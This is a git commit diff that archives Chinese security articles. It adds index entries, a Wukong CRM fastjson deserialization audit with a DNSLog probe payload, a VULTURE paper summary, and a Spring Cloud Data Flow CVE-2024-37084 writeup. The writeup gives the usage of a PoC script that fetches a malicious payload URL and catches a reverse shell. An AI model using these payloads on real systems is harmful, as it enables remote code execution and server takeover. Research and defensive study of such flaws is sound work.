NDSS 2025新作 | 靠谱的第三方库?VULTURE破解1-Day漏洞难题!、JAVA代码审计-悟空crm客户管理系统fastjson漏洞、Spring Cloud Data Flow高危漏洞(CVE-2024-37084)、

This commit is contained in:
test 2024-11-25 20:12:22 +00:00
parent 6c302971d5
commit bb1feb90b4
4 changed files with 131 additions and 5 deletions

View File

@ -561,5 +561,8 @@
"https://mp.weixin.qq.com/s?__biz=Mzg2Nzk0NjA4Mg==&mid=2247496018&idx=1&sn=956febb67d5ca7bf7a5fcfc7081882fc": "HTB-Chemistry靶机渗透CVE-2024-23334系统目录遍历导致权限提升",
"https://mp.weixin.qq.com/s?__biz=MzkzNjIzMjM5Ng==&mid=2247490016&idx=1&sn=06f0f108f0e7392bcfc6fe22c487fc23": "IaC 和 PaC 工具中的网络安全缺陷使云平台面临新的攻击",
"https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651308150&idx=4&sn=aa3e8e9a372353b8edcbdd2ebc74f5e3": "EmbedPayloadInPng一款图片文件Payload嵌入工具",
"https://mp.weixin.qq.com/s?__biz=MzkxNjY1MjY3OQ==&mid=2247487959&idx=1&sn=981fb1ea9387be08c67c81aaa2c81503": "SRM智联云采系统receiptDetail SQL注入漏洞复现及POC"
"https://mp.weixin.qq.com/s?__biz=MzkxNjY1MjY3OQ==&mid=2247487959&idx=1&sn=981fb1ea9387be08c67c81aaa2c81503": "SRM智联云采系统receiptDetail SQL注入漏洞复现及POC",
"https://mp.weixin.qq.com/s?__biz=MzkxODUxMzE1Ng==&mid=2247484045&idx=1&sn=824549aef0519d9de2e444832a901154": "NDSS 2025新作 | 靠谱的第三方库VULTURE破解1-Day漏洞难题",
"https://mp.weixin.qq.com/s?__biz=MzU2NDY2OTU4Nw==&mid=2247517265&idx=1&sn=12f3ccf4ea4997016ef704f9c957f4c6": "JAVA代码审计-悟空crm客户管理系统fastjson漏洞",
"https://mp.weixin.qq.com/s?__biz=MzU3NzY3MzYzMw==&mid=2247498679&idx=1&sn=8ba88739d244d4773cd4ad10d7aa2c5f": "Spring Cloud Data Flow高危漏洞CVE-2024-37084"
}

View File

@ -0,0 +1,58 @@
# JAVA代码审计-悟空crm客户管理系统fastjson漏洞
船山信安 2024-11-25 16:07
## 一. 本地搭建
版本Wukong CRM9.0
1. 搭建需要使用myql数据库和redis两个使用phpstudy搭建即可mysql数据库的文件为WukongCRM-9.0-JAVA-9.0.1_20191202/src/main/resources/config/crm9-config.txt将下载的crm9.sql导入数据库即可数据库格式为UTF-8redis配置文件为同目录下的redis.json文件redis默认密码为123456。
![](https://mmbiz.qpic.cn/mmbiz_jpg/7nIrJAgaibicNgqyV0ic09xj6KicD7Y1fn9OXWbUsdp8nKicoFJWUiaiayjiaP37JuhTDd01WpBe6TvSjHaXsV2ZsDbF9w/640?wx_fmt=jpeg&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/7nIrJAgaibicNgqyV0ic09xj6KicD7Y1fn9O8AbyLJsMCI9iaoYBLfZV8UcVgY5bkfqzqibiaGw3cSvoX7PNJMzn24g8w/640?wx_fmt=jpeg&from=appmsg "")
2. 配置好后使用idea打开配置Tomcat中间件进行本地运行没有报错正常起来界面如下默认账号为admin/123456
![](https://mmbiz.qpic.cn/mmbiz_jpg/7nIrJAgaibicNgqyV0ic09xj6KicD7Y1fn9OEEpULeWia1Aj1jdFx8DRBVBuGK8S7EYzqEJD8VudQpVCbGYgOBKehbA/640?wx_fmt=jpeg&from=appmsg "")
## 二. fastjson漏洞审计
1. 查看pom.xml文件发现引用了fastjson组件版本为有漏洞的1.2.54。
![](https://mmbiz.qpic.cn/mmbiz_jpg/7nIrJAgaibicNgqyV0ic09xj6KicD7Y1fn9O5YeuclpKTXj1lqmIicDd61iafgxu2MibuDa5Ceayf3D97YhqjtVtyP2UQ/640?wx_fmt=jpeg&from=appmsg "")
2. 确定后,查找哪里引用了组件,并且是可控的。
```
```
![](https://mmbiz.qpic.cn/mmbiz_jpg/7nIrJAgaibicNgqyV0ic09xj6KicD7Y1fn9OrUJvkhsKUywhybClQNhIwXm8h8KWoFr9tAjZnoPicycMe9jzchIN8Mw/640?wx_fmt=jpeg&from=appmsg "")
3. 发现好多地方引用,这个方法如果没有其他处理的话,是会引起反序列话的,进入一个查看具体的代码。
> 在AdminExamineController.java中的添加审批处
> 代码解释@Permissions("manage:examineFlow:update")这是一个注解,用于权限控制。表示调用此方法需要具有 manage:examineFlow:update 权限。public void saveExamine()定义了一个公共方法 saveExamine该方法没有返回值void。JSONObject jsonObject = JSON.parseObject(getRawData());从请求中获取原始数据getRawData() 方法返回一个字符串),并将其解析为一个 JSONObject 对象。JSON.parseObject 是一个将 JSON 字符串转换为 JSONObject 的方法。renderJson(examineService.saveExamine(jsonObject));调用 examineService 对象的 saveExamine 方法,并将解析后的 jsonObject 作为参数传递。examineService.saveExamine(jsonObject) 的返回值将被传递给 renderJson 方法,用于生成 HTTP 响应的 JSON 格式数据。
![](https://mmbiz.qpic.cn/mmbiz_jpg/7nIrJAgaibicNgqyV0ic09xj6KicD7Y1fn9O9FLsPpicI9WZZKRIeMotYM32rK8ic8GLBn58pJiaiaKJMQF381vAoibZOVw/640?wx_fmt=jpeg&from=appmsg "")
4. 根据提示找到添加审批处抓包尝试dnslog。
![](https://mmbiz.qpic.cn/mmbiz_jpg/7nIrJAgaibicNgqyV0ic09xj6KicD7Y1fn9OWMzQQTFTrvdBCFqNkbwCicl8viaC16xcklIcsAORJ6cPay92yfRib1BiaQ/640?wx_fmt=jpeg&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/7nIrJAgaibicNgqyV0ic09xj6KicD7Y1fn9O44iaxXeUykQhxR8whImaG9zN84yl41cQiazfaRsye77VfD5SopFUTROg/640?wx_fmt=jpeg&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/7nIrJAgaibicNgqyV0ic09xj6KicD7Y1fn9Oiam3gWhQy3wHLI5gKkqLhCnOCETpOzXFrQjmv1qBybLhiciao3ib8KHaow/640?wx_fmt=jpeg&from=appmsg "")
5. 打开dnslog平台使用fastjson漏洞poc探测可以看到成功回显。
> {"zeo":{"@type":"java.net.Inet4Address","val":"0r8b41.dnslog.cn"}![](https://mmbiz.qpic.cn/mmbiz_jpg/7nIrJAgaibicNgqyV0ic09xj6KicD7Y1fn9ORYBBTFptlRUhnRQ0uwXrcLrJgqBmiayFkycOm5Yx05ibfGSgPmJR5R2A/640?wx_fmt=jpeg&from=appmsg "")
>
> 结尾:这只是其中的一处,根据代码搜索看在产品处,线索处等都存在漏洞。
> ![](https://mmbiz.qpic.cn/mmbiz_jpg/7nIrJAgaibicNgqyV0ic09xj6KicD7Y1fn9O6XcEpFzFI1kVT8rT93y5v7OE5ZGy94LXyLIvDDiasLzMgo4JZSWpkLw/640?wx_fmt=jpeg&from=appmsg "")
> ![](https://mmbiz.qpic.cn/mmbiz_jpg/7nIrJAgaibicNgqyV0ic09xj6KicD7Y1fn9OwhDqyJLDEiccdsz49ue7JiaRdAXrYF88KyEDFHJibbbxZX9NXZcxRS36A/640?wx_fmt=jpeg&from=appmsg "")
来源:【
JAVA代码审计-悟空crm客户管理系统fastjson漏洞 - FreeBuf网络安全行业门户

View File

@ -1,5 +1,5 @@
# NDSS 2025新作 | 靠谱的第三方库VULTURE破解1-Day漏洞难题
原创 Shangzhi Xu SecNotes 2024-11-25 07:55
原创 Shangzhi Xu SecNotes 2024-11-25 19:19
**“**
 软件开发的时候使用第三方库Thrid Party Library, TPL早已成为开发者的标配既省时又省力。但方便的背后往往藏着 1-Day 漏洞的风险。
@ -11,8 +11,7 @@
1-Day
 漏洞并提供详细的修复建议。**”**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ELicaicj3FtibnTuicicMGCK8icXDY4mpYdde3Hwib8JuvugJ8Zy914C0NeicKqANh9bTwFcYy7gtollx3un1SnaRL8Bhg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ELicaicj3FtibnUsXu6oEOOJt1Kd8geayOic8D49p71ySFQCJ5XLibV84AO0pSxndiaXy2VL4xDygwYIYv0C6v8e1OEw/640?wx_fmt=png&from=appmsg "")
## 1. 什么是1-Day漏洞
@ -27,7 +26,7 @@
我们的工具VULTURE就是为了解决上述问题精确找到目标软件中可能存在的1-Day vulnerability。流程图如下
VULTURE先收集一个包含已知漏洞&漏洞patch的数据库随后检测目标软件是否包含已知漏洞影响的TPLs版本如果包含收影响版本进一步检测是否漏洞已经被patch从而定位1-Day 漏洞。
VULTURE先收集一个包含已知漏洞&漏洞patch的数据库随后检测目标软件是否包含已知漏洞影响的TPLs版本如果包含收影响版本进一步检测是否漏洞已经被patch从而定位1-Day 漏洞。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ELicaicj3FtibnTuicicMGCK8icXDY4mpYdde3VBuRnBoicHTvsMdpurf33fMvNrHGR3R5k6EhHuJqaDcWqibvI6OoIxDw/640?wx_fmt=png&from=appmsg "")

View File

@ -0,0 +1,66 @@
# Spring Cloud Data Flow高危漏洞CVE-2024-37084
XiaomingX 网络安全者 2024-11-25 16:00
===================================
免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
0x01 工具介绍
CVE-2024-37084是Spring Cloud Data Flow中的一个高危漏洞影响版本为2.11.0至2.11.3。该漏洞允许具有Skipper服务器API访问权限的攻击者通过精心构造的上传请求将任意文件写入服务器文件系统的任意位置进而可能导致远程代码执行严重威胁服务器安全。
0x02 安装与使用
漏洞原理 在受影响的Spring Cloud Data Flow版本中Skipper服务器在处理文件上传时缺乏对路径的有效验证。攻击者可以利用这一缺陷构造恶意的上传请求将包含特定YAML文件的压缩包上传至服务器。由于服务器在处理这些YAML文件时使用了不安全的反序列化机制攻击者可以通过在YAML文件中嵌入恶意代码导致服务器执行任意代码。
危害: 成功利用该漏洞的攻击者可以在受影响的服务器上执行任意代码,可能导致以下后果:
- 服务器被完全控制: 攻击者可获取服务器的最高权限,执行任意操作。
- 数据泄露: 攻击者可能访问或窃取服务器上的敏感数据。
- 服务中断: 攻击者可能破坏服务器的正常运行,导致服务不可用。
修复建议 官方已在2.11.4版本中修复了该漏洞。建议用户尽快将Spring Cloud Data Flow升级至2.11.4或更高版本,以消除安全隐患。
本项目包括对 CVE-2024-37084 的环境配置、漏洞分析、演示利用和漏洞利用代码PoC
## 使用方法:
```
python CVE-2024-37084-Poc.py
```
##
用法示例:
```
python CVE-2024-37084-Poc.py --target_url <目标网址> --version <版本号> --payload_url <恶意载荷网址> [--listen_ip <监听IP>] [--listen_port <监听端口>]
```
### 可选参数:
```
-h, --help显示帮助信息并退出
--target_url TARGET_URL目标服务器的 URL例如http://目标_IP:端口/api/package/upload
--version VERSION包的版本号例如5.0.0
--payload_url PAYLOAD_URL恶意载荷的 URL例如https://too.lewd.se/yaml-payload.jar
--listen_ip LISTEN_IP监听反向 shell 的 IP 地址默认值0.0.0.0
--listen_port LISTEN_PORT监听反向 shell 的端口号默认值4444
```
## 配置监听端口以捕获反向 shell
##
****
**0x03 下载链接**
1、通过阅读原文到项目地址下载
2、
网盘下载
链接
https://pan.quark.cn/s/80623768e319
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0JJXjA8siccxyM4QFFOeUJ0DcGWRDR8WaIk6UgdaXQdVib3icjiaQxUqhFoFrMNhWwR2PhAsuTkmIboDTId5oicL6Ng/640?wx_fmt=png&from=appmsg "")
该内容转载自网络,仅供学习交流,勿作他用,如有侵权请联系删除。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0JJXjA8siccxyM4QFFOeUJ0DcGWRDR8WaQvicu0B2KN7ucFV8ibR5S0OnmryIje3mkRuKhyBP1lPcAZFhKoU3iaLAQ/640?wx_fmt=png&from=appmsg "")